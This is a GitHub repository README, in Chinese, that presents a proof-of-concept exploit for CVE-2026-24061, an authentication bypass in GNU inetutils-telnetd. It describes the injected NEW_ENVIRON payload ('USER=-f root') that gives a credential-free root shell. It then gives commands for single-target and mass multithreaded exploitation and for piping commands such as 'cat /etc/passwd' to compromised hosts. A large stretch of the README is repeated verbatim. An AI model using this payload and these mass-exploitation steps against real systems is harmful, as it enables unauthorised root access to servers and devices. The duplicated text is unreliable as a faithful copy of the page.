tc4dy/CVE-2026-24061-PoC-Exploit
GitHub: tc4dy/CVE-2026-24061-PoC-Exploit
针对 GNU inetutils-telnetd 身份验证绕过漏洞 CVE-2026-24061 的 PoC 漏洞利用工具,支持批量扫描与直接获取 root shell。
Stars: 0 | Forks: 0
# 🚀 CVE-2026-24061 - GNU inetutils-telnetd 身份验证绕过漏洞利用
[](https://www.python.org/)
[](https://www.gnu.org/software/bash/)
[](LICENSE)
[](https://nvd.nist.gov/vuln/detail/CVE-2026-24061)
## 📌 概述
本漏洞利用程序利用了 **CVE-2026-24061**,这是 **GNU inetutils-telnetd** 中一个严重的远程身份验证绕过漏洞。通过注入精心构造的带有 `USER='-f root'` 的 NEW_ENVIRON payload,它可以绕过身份验证,并在无需任何凭证的情况下直接获取 root shell。
### 🔥 核心功能
| 类别 | 功能 |
|----------|----------|
| **漏洞利用** | ✅ 通过 CRLF 注入绕过身份验证
✅ 即时获取 Root Shell
✅ 自定义用户注入 (-f admin, -f user) | | **扫描** | ✅ 单目标漏洞利用
✅ 基于文件的批量漏洞利用
✅ 多线程(支持自定义线程数)
✅ 自定义端口支持 | | **高级功能** | ✅ 管道模式(通过 stdin 执行命令)
✅ 会话保持活跃
✅ 重试机制
✅ 超时控制 | | **易用性** | ✅ 彩色输出 (colorama)
✅ 双语言支持(Python 与 Bash)
✅ 详细/调试模式 | ## 🎯 受影响版本 | 产品 | 版本 | |---------|----------| | GNU inetutils-telnetd | 1.9.3 - 2.7 | | Linux 发行版 | Debian, Ubuntu, CentOS(受影响) | | 嵌入式设备 | NAS, IoT, 路由器 | ## 📦 安装说明 ``` # 克隆 repository git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit cd CVE-2026-24061-PoC-Exploit # Python 版本 pip3 install -r requirements.txt # Bash 版本 chmod +x exploit.sh chmod +x basic_exploit.sh ``` ## 🛠️ 使用示例 ## 🎯 单目标漏洞利用 ``` # Python 版本 python3 exploit.py -u 192.168.1.100 # Bash 版本 ./exploit.sh -u 192.168.1.100 ./basic_exploit.sh 192.168.1.100 ``` ## 🔧 自定义端口和用户 ``` # 自定义 port(非标准 telnet port) python3 exploit.py -u 10.0.0.5 -p 2323 # 自定义 username 注入 python3 exploit.py -u 10.0.0.5 -usr admin ``` ## 📊 批量漏洞利用(多目标) ``` # 创建 targets 文件 echo "192.168.1.100" > targets.txt echo "192.168.1.101" >> targets.txt echo "10.0.0.5:2323" >> targets.txt # 使用 20 个线程进行 Mass exploit python3 exploit.py -l targets.txt -m 20 # Bash 版本 ./exploit.sh -l targets.txt -m 20 ``` ## 📡 管道模式(命令执行) ``` # 通过 pipe 执行 commands echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100 # 多个 commands echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100 ``` ## ⚙️ 高级选项 ``` # 带 debug 输出的 Verbose 模式 python3 exploit.py -u 192.168.1.100 -v # 自定义 timeout 和 retries python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5 # Session keep-alive(维持 shell) python3 exploit.py -u 192.168.1.100 --keep-alive ``` ## 📊 命令行参数 | 简写 | 全称 | 描述 | 默认值 | |-------|------|-------------|---------| | `-u` | `--url` | 目标 IP 地址 | 必填 | | `-p` | `--port` | 目标端口 | 23 | | `-l` | `--list` | 包含目标列表的文件 | 无 | | `-m` | `--max-threads` | 批量漏洞利用的最大线程数 | 10 | | `-usr` | `--username` | 要注入的用户名 | root | | `-t` | `--timeout` | Socket 超时时间(秒) | 10 | | `-r` | `--retries` | 重试次数 | 3 | | `-v` | `--verbose` | 启用调试输出 | False | | `--keep-alive` | | 漏洞利用后保持会话活跃 | False | ## 🔗 相关漏洞利用 查看我的其他漏洞利用代码库: - [CVE-2026-41940](https://github.com/tc4dy/CVE-2026-41940-PoC-Exploit) - [CVE-2026-0073](https://github.com/tc4dy/CVE-2026-0073-PoC-Exploit) - [CVE-2026-29000](https://github.com/tc4dy/CVE-2026-29000-PoC-Exploit)
✅ 即时获取 Root Shell
✅ 自定义用户注入 (-f admin, -f user) | | **扫描** | ✅ 单目标漏洞利用
✅ 基于文件的批量漏洞利用
✅ 多线程(支持自定义线程数)
✅ 自定义端口支持 | | **高级功能** | ✅ 管道模式(通过 stdin 执行命令)
✅ 会话保持活跃
✅ 重试机制
✅ 超时控制 | | **易用性** | ✅ 彩色输出 (colorama)
✅ 双语言支持(Python 与 Bash)
✅ 详细/调试模式 | ## 🎯 受影响版本 | 产品 | 版本 | |---------|----------| | GNU inetutils-telnetd | 1.9.3 - 2.7 | | Linux 发行版 | Debian, Ubuntu, CentOS(受影响) | | 嵌入式设备 | NAS, IoT, 路由器 | ## 📦 安装说明 ``` # 克隆 repository git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit cd CVE-2026-24061-PoC-Exploit # Python 版本 pip3 install -r requirements.txt # Bash 版本 chmod +x exploit.sh chmod +x basic_exploit.sh ``` ## 🛠️ 使用示例 ## 🎯 单目标漏洞利用 ``` # Python 版本 python3 exploit.py -u 192.168.1.100 # Bash 版本 ./exploit.sh -u 192.168.1.100 ./basic_exploit.sh 192.168.1.100 ``` ## 🔧 自定义端口和用户 ``` # 自定义 port(非标准 telnet port) python3 exploit.py -u 10.0.0.5 -p 2323 # 自定义 username 注入 python3 exploit.py -u 10.0.0.5 -usr admin ``` ## 📊 批量漏洞利用(多目标) ``` # 创建 targets 文件 echo "192.168.1.100" > targets.txt echo "192.168.1.101" >> targets.txt echo "10.0.0.5:2323" >> targets.txt # 使用 20 个线程进行 Mass exploit python3 exploit.py -l targets.txt -m 20 # Bash 版本 ./exploit.sh -l targets.txt -m 20 ``` ## 📡 管道模式(命令执行) ``` # 通过 pipe 执行 commands echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100 # 多个 commands echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100 ``` ## ⚙️ 高级选项 ``` # 带 debug 输出的 Verbose 模式 python3 exploit.py -u 192.168.1.100 -v # 自定义 timeout 和 retries python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5 # Session keep-alive(维持 shell) python3 exploit.py -u 192.168.1.100 --keep-alive ``` ## 📊 命令行参数 | 简写 | 全称 | 描述 | 默认值 | |-------|------|-------------|---------| | `-u` | `--url` | 目标 IP 地址 | 必填 | | `-p` | `--port` | 目标端口 | 23 | | `-l` | `--list` | 包含目标列表的文件 | 无 | | `-m` | `--max-threads` | 批量漏洞利用的最大线程数 | 10 | | `-usr` | `--username` | 要注入的用户名 | root | | `-t` | `--timeout` | Socket 超时时间(秒) | 10 | | `-r` | `--retries` | 重试次数 | 3 | | `-v` | `--verbose` | 启用调试输出 | False | | `--keep-alive` | | 漏洞利用后保持会话活跃 | False | ## 🔗 相关漏洞利用 查看我的其他漏洞利用代码库: - [CVE-2026-41940](https://github.com/tc4dy/CVE-2026-41940-PoC-Exploit) - [CVE-2026-0073](https://github.com/tc4dy/CVE-2026-0073-PoC-Exploit) - [CVE-2026-29000](https://github.com/tc4dy/CVE-2026-29000-PoC-Exploit)
标签:Bash, PE 加载器, Python, 安全, 应用安全, 无后门, 超时处理, 逆向工具